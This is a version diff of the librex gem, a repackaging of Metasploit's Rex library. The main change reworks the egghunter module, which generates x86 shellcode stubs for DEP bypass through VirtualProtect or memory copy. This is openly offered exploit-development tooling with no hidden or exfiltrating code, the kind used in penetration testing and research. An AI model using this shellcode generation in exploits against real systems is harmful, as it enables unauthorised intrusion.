librex 0.0.41 → 0.0.42
- data/README.markdown +1 -1
- data/lib/rex/exploitation/egghunter.rb +54 -24
- metadata +3 -3
data/README.markdown
CHANGED
@@ -3,7 +3,7 @@
|
|
3
3
|
A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
|
4
4
|
|
5
5
|
Currently based on:
|
6
|
-
SVN Revision:
|
6
|
+
SVN Revision: 13159
|
7
7
|
|
8
8
|
# Credits
|
9
9
|
The Metasploit development team <http://www.metasploit.com>
|
@@ -69,6 +69,11 @@ class Egghunter
|
|
69
69
|
|
70
70
|
freeregs = [ "esi", "ebp", "ecx", "ebx" ]
|
71
71
|
|
72
|
+
reginfo = {
|
73
|
+
"ebx"=>["bx","bl","bh"],
|
74
|
+
"ecx"=>["cx","cl","ch"]
|
75
|
+
}
|
76
|
+
|
72
77
|
if opts[:depmethod]
|
73
78
|
|
74
79
|
if freeregs.index(apireg) == nil
|
@@ -102,29 +107,54 @@ class Egghunter
|
|
102
107
|
end
|
103
108
|
end
|
104
109
|
|
105
|
-
|
106
|
-
|
107
|
-
|
108
|
-
|
109
|
-
|
110
|
-
|
111
|
-
|
112
|
-
|
113
|
-
|
114
|
-
|
115
|
-
|
116
|
-
|
117
|
-
|
118
|
-
|
119
|
-
|
120
|
-
|
110
|
+
if depsize <= 127
|
111
|
+
getsize << "push 0x%02x\n\t" % depsize
|
112
|
+
else
|
113
|
+
sizebytes = "%04x" % depsize
|
114
|
+
low = sizebytes[2,4]
|
115
|
+
high = sizebytes[0,2]
|
116
|
+
if sizereg == "ecx" || sizereg == "ebx"
|
117
|
+
regvars = reginfo[sizereg]
|
118
|
+
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
119
|
+
if low != "00" and high != "00"
|
120
|
+
getsize << "mov #{regvars[0]},0x%s\n\t" % sizebytes
|
121
|
+
elsif low != "00"
|
122
|
+
getsize << "mov #{regvars[1]},0x%s\n\t" % low
|
123
|
+
elsif high != "00"
|
124
|
+
getsize << "mov #{regvars[2]},0x%s\n\t" % high
|
125
|
+
end
|
126
|
+
getsize << "push #{sizereg}\n\t"
|
127
|
+
end
|
128
|
+
if sizereg == "ebp"
|
129
|
+
if low != "00" and high != "00"
|
130
|
+
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
131
|
+
getsize << "mov bp,0x%s\n\t" % sizebytes
|
132
|
+
getsize << "push #{sizereg}\n\t"
|
133
|
+
end
|
121
134
|
end
|
122
|
-
|
123
|
-
if
|
124
|
-
|
135
|
+
# last resort
|
136
|
+
if getsize == ''
|
137
|
+
blockcnt = 0
|
138
|
+
vpsize = 0
|
139
|
+
blocksize = depsize
|
140
|
+
while blocksize > 127
|
141
|
+
blocksize = blocksize / 2
|
142
|
+
blockcnt += 1
|
143
|
+
end
|
144
|
+
getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % blocksize
|
145
|
+
vpsize = blocksize
|
146
|
+
depblockcnt = 0
|
147
|
+
while depblockcnt < blockcnt
|
148
|
+
getsize << "add #{sizereg},#{sizereg}\n\t"
|
149
|
+
vpsize += vpsize
|
150
|
+
depblockcnt += 1
|
151
|
+
end
|
152
|
+
delta = depsize - vpsize
|
153
|
+
if delta > 0
|
154
|
+
getsize << "add #{sizereg},0x%02x\n\t" % delta
|
155
|
+
end
|
156
|
+
getsize << "push #{sizereg}\n\t"
|
125
157
|
end
|
126
|
-
else
|
127
|
-
getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % depsize
|
128
158
|
end
|
129
159
|
|
130
160
|
|
@@ -132,21 +162,21 @@ class Egghunter
|
|
132
162
|
when "virtualprotect"
|
133
163
|
jmppayload = "push esp\n\tpush 0x40\n\t"
|
134
164
|
jmppayload << getsize
|
135
|
-
jmppayload << "push
|
165
|
+
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
136
166
|
when "copy"
|
137
167
|
jmppayload = getpc
|
138
168
|
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
139
169
|
when "copy_size"
|
140
170
|
jmppayload = getpc
|
141
171
|
jmppayload << getsize
|
142
|
-
jmppayload << "push
|
172
|
+
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
143
173
|
end
|
144
174
|
end
|
145
175
|
|
146
176
|
jmppayload << "\n" if jmppayload.length > 0
|
147
177
|
|
148
178
|
assembly = <<EOS
|
149
|
-
#{getpointer}
|
179
|
+
#{getpointer}
|
150
180
|
#{startstub}
|
151
181
|
check_readable:
|
152
182
|
or dx,0xfff
|
metadata
CHANGED
@@ -2,7 +2,7 @@
|
|
2
2
|
name: librex
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 0.0.
|
5
|
+
version: 0.0.42
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Metasploit Development Team
|
@@ -11,11 +11,11 @@ autorequire:
|
|
11
11
|
bindir: bin
|
12
12
|
cert_chain: []
|
13
13
|
|
14
|
-
date: 2011-07-
|
14
|
+
date: 2011-07-12 00:00:00 -05:00
|
15
15
|
default_executable:
|
16
16
|
dependencies: []
|
17
17
|
|
18
|
-
description: Rex provides a variety of classes useful for security testing and exploit development. Based on SVN Revision
|
18
|
+
description: Rex provides a variety of classes useful for security testing and exploit development. Based on SVN Revision 13159
|
19
19
|
email:
|
20
20
|
- hdm@metasploit.com
|
21
21
|
- jacob.hammack@hammackj.com
|